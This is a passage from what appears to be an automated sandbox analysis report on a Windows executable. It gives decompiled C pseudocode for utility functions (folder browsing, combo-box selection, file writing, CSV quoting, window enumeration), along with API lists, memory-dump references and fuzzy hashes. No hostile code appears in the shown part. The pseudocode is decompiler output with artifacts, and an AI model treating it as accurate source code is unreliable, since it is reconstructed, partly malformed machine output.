					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                                      0x0040588e
                                                                                      0x0040588f
                                                                                      0x0040588f
                                                                                      0x00405892
                                                                                      0x00405896
                                                                                      0x004058a9
                                                                                      0x004058a9
                                                                                      0x004058ad
                                                                                      0x004058af
                                                                                      0x004058b5
                                                                                      0x004058b6
                                                                                      0x004058b9
                                                                                      0x004058c2
                                                                                      0x004058c3
                                                                                      0x004058c8
                                                                                      0x004058d2
                                                                                      0x004058d4
                                                                                      0x004058d9
                                                                                      0x004058e0
                                                                                      0x004058ea
                                                                                      0x004058ec
                                                                                      0x004058ed
                                                                                      0x004058f2
                                                                                      0x004058f9
                                                                                      0x00405902
                                                                                      0x00405898
                                                                                      0x00405898
                                                                                      0x0040589a
                                                                                      0x0040589c
                                                                                      0x004058a1
                                                                                      0x004058a2
                                                                                      0x004058a5
                                                                                      0x004058a7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004058a7
                                                                                      0x00405912
                                                                                      0x00405915
                                                                                      0x0040591e
                                                                                      0x0040591e
                                                                                      0x00405907
                                                                                      0x0040590b

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                      • String ID:
                                                                                      • API String ID: 1865533344-0
                                                                                      • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                      • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                      • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                      • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 37%
                                                                                      			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}




















                                                                                      0x0040ad06
                                                                                      0x0040ad0a
                                                                                      0x0040ad0c
                                                                                      0x0040ad14
                                                                                      0x0040ad19
                                                                                      0x0040ad1f
                                                                                      0x0040ad23
                                                                                      0x0040ad27
                                                                                      0x0040ad2a
                                                                                      0x0040ad2d
                                                                                      0x0040ad34
                                                                                      0x0040ad3b
                                                                                      0x0040ad3e
                                                                                      0x0040ad44
                                                                                      0x0040ad48
                                                                                      0x0040ad4a
                                                                                      0x0040ad52
                                                                                      0x0040ad5a
                                                                                      0x0040ad64
                                                                                      0x0040ad65
                                                                                      0x0040ad6b
                                                                                      0x0040ad6c
                                                                                      0x0040ad73
                                                                                      0x0040ad76
                                                                                      0x0040ad7c
                                                                                      0x0040ad7c
                                                                                      0x0040ad7f
                                                                                      0x0040ad84

                                                                                      APIs
                                                                                      • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                      • wcscpy.MSVCRT ref: 0040AD65
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                      • String ID:
                                                                                      • API String ID: 3917621476-0
                                                                                      • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                      • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                      • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                      • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}








                                                                                      0x00404a62
                                                                                      0x00404a6a
                                                                                      0x00404a6e
                                                                                      0x00404a71
                                                                                      0x00404a74
                                                                                      0x00404a92
                                                                                      0x00404a92
                                                                                      0x00404a76
                                                                                      0x00404a76
                                                                                      0x00404a87
                                                                                      0x00404a90
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404a90
                                                                                      0x00404aa3
                                                                                      0x00404aa7
                                                                                      0x00404aa7
                                                                                      0x00404a94
                                                                                      0x00404a98

                                                                                      APIs
                                                                                      • GetDlgItem.USER32 ref: 00404A52
                                                                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Item
                                                                                      • String ID:
                                                                                      • API String ID: 3888421826-0
                                                                                      • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                      • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                      • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                      • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 93%
                                                                                      			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}






                                                                                      0x004072e0
                                                                                      0x004072f7
                                                                                      0x004072fd
                                                                                      0x00407316
                                                                                      0x00407342

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004072FD
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                      • strlen.MSVCRT ref: 00407328
                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2754987064-0
                                                                                      • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                      • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                      • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                      • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}





                                                                                      0x00408dd0
                                                                                      0x00408dd2
                                                                                      0x00408de2
                                                                                      0x00408df4
                                                                                      0x00408e01
                                                                                      0x00408e1b
                                                                                      0x00408e21
                                                                                      0x00408e28
                                                                                      0x00408e30
                                                                                      0x00408dd4
                                                                                      0x00408dd8
                                                                                      0x00408dd8

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memcpy$DialogHandleModuleParam
                                                                                      • String ID:
                                                                                      • API String ID: 1386444988-0
                                                                                      • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                      • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                      • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                      • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}








                                                                                      0x004050e1
                                                                                      0x004050ec
                                                                                      0x004050ee
                                                                                      0x004050f5
                                                                                      0x004050ff
                                                                                      0x00405114
                                                                                      0x00405118
                                                                                      0x00405123
                                                                                      0x00405128
                                                                                      0x00405101
                                                                                      0x00405109
                                                                                      0x0040510f
                                                                                      0x0040512e

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: wcslen$wcscatwcsncat
                                                                                      • String ID:
                                                                                      • API String ID: 291873006-0
                                                                                      • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                      • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                      • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                      • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}









                                                                                      0x00402de0
                                                                                      0x00402de2
                                                                                      0x00402dec
                                                                                      0x00402def
                                                                                      0x00402dfb
                                                                                      0x00402e0c
                                                                                      0x00402e0e
                                                                                      0x00402e0e
                                                                                      0x00402e16
                                                                                      0x00402e18
                                                                                      0x00402e1a
                                                                                      0x00402e21

                                                                                      APIs
                                                                                      • GetClientRect.USER32 ref: 00402DEF
                                                                                      • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                      • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                        • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                        • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Window$Rect$ClientPoints
                                                                                      • String ID:
                                                                                      • API String ID: 4235085887-0
                                                                                      • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                      • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                      • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                      • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 72%
                                                                                      			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}







                                                                                      0x0040b6a6
                                                                                      0x0040b6ad
                                                                                      0x0040b6af
                                                                                      0x0040b6b0
                                                                                      0x0040b6b5
                                                                                      0x0040b6b6
                                                                                      0x0040b6bd
                                                                                      0x0040b6bf
                                                                                      0x0040b6c0
                                                                                      0x0040b6c5
                                                                                      0x0040b6c6
                                                                                      0x0040b6cd
                                                                                      0x0040b6cf
                                                                                      0x0040b6d0
                                                                                      0x0040b6d5
                                                                                      0x0040b6d6
                                                                                      0x0040b6dd
                                                                                      0x0040b6df
                                                                                      0x0040b6e0
                                                                                      0x00000000
                                                                                      0x0040b6e5
                                                                                      0x0040b6e6

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ??3@
                                                                                      • String ID:
                                                                                      • API String ID: 613200358-0
                                                                                      • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                      • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                      • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                      • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 75%
                                                                                      			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}























                                                                                      0x00407362
                                                                                      0x00407369
                                                                                      0x0040736e
                                                                                      0x00407371
                                                                                      0x00407378
                                                                                      0x0040737e
                                                                                      0x00407381
                                                                                      0x00407386
                                                                                      0x0040739f
                                                                                      0x00407388
                                                                                      0x00407391
                                                                                      0x00407391
                                                                                      0x004073a4
                                                                                      0x004073ac
                                                                                      0x004073ad
                                                                                      0x004073cd
                                                                                      0x004073d0
                                                                                      0x004073d3
                                                                                      0x004073d6
                                                                                      0x004073e0
                                                                                      0x004073e7
                                                                                      0x004073ee
                                                                                      0x004073f5
                                                                                      0x0040741a
                                                                                      0x0040741a
                                                                                      0x0040741d
                                                                                      0x00407420
                                                                                      0x00407423
                                                                                      0x00407426
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004073fc
                                                                                      0x00407400
                                                                                      0x0040740f
                                                                                      0x00407412
                                                                                      0x00407412
                                                                                      0x00407402
                                                                                      0x00407402
                                                                                      0x00407407
                                                                                      0x00407407
                                                                                      0x00407413
                                                                                      0x00407419
                                                                                      0x00407419
                                                                                      0x00407419
                                                                                      0x0040742f
                                                                                      0x00407434
                                                                                      0x00407437
                                                                                      0x00407439
                                                                                      0x0040743b
                                                                                      0x0040743b
                                                                                      0x0040744e
                                                                                      0x00407453
                                                                                      0x00407453
                                                                                      0x004073af
                                                                                      0x004073b2
                                                                                      0x004073ba
                                                                                      0x004073bb
                                                                                      0x00000000
                                                                                      0x004073bd
                                                                                      0x004073c3
                                                                                      0x004073c3
                                                                                      0x004073bb
                                                                                      0x0040745c
                                                                                      0x00407468
                                                                                      0x00407468
                                                                                      0x0040746d
                                                                                      0x00407473
                                                                                      0x0040747c
                                                                                      0x0040748e

                                                                                      APIs
                                                                                      • wcschr.MSVCRT ref: 004073A4
                                                                                      • wcschr.MSVCRT ref: 004073B2
                                                                                        • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                        • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: wcschr$memcpywcslen
                                                                                      • String ID: "
                                                                                      • API String ID: 1983396471-123907689
                                                                                      • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                      • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                      • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                      • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 45%
                                                                                      			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}













                                                                                      0x00401676
                                                                                      0x0040167e
                                                                                      0x0040168a
                                                                                      0x0040168c
                                                                                      0x00401690
                                                                                      0x00401691
                                                                                      0x00401696
                                                                                      0x0040169d
                                                                                      0x004016a2
                                                                                      0x004016aa
                                                                                      0x004016aa
                                                                                      0x004016aa
                                                                                      0x004016ad
                                                                                      0x004016ae
                                                                                      0x004016b3
                                                                                      0x004016b9
                                                                                      0x004016bb
                                                                                      0x004016bc
                                                                                      0x004016c1
                                                                                      0x004016c8
                                                                                      0x004016cd
                                                                                      0x004016ce
                                                                                      0x004016ea
                                                                                      0x004016ff
                                                                                      0x0040170c
                                                                                      0x004016d0
                                                                                      0x004016e3
                                                                                      0x004016e3
                                                                                      0x00401711
                                                                                      0x00401714
                                                                                      0x00000000
                                                                                      0x00401719
                                                                                      0x0040171c

                                                                                      APIs
                                                                                      Strings
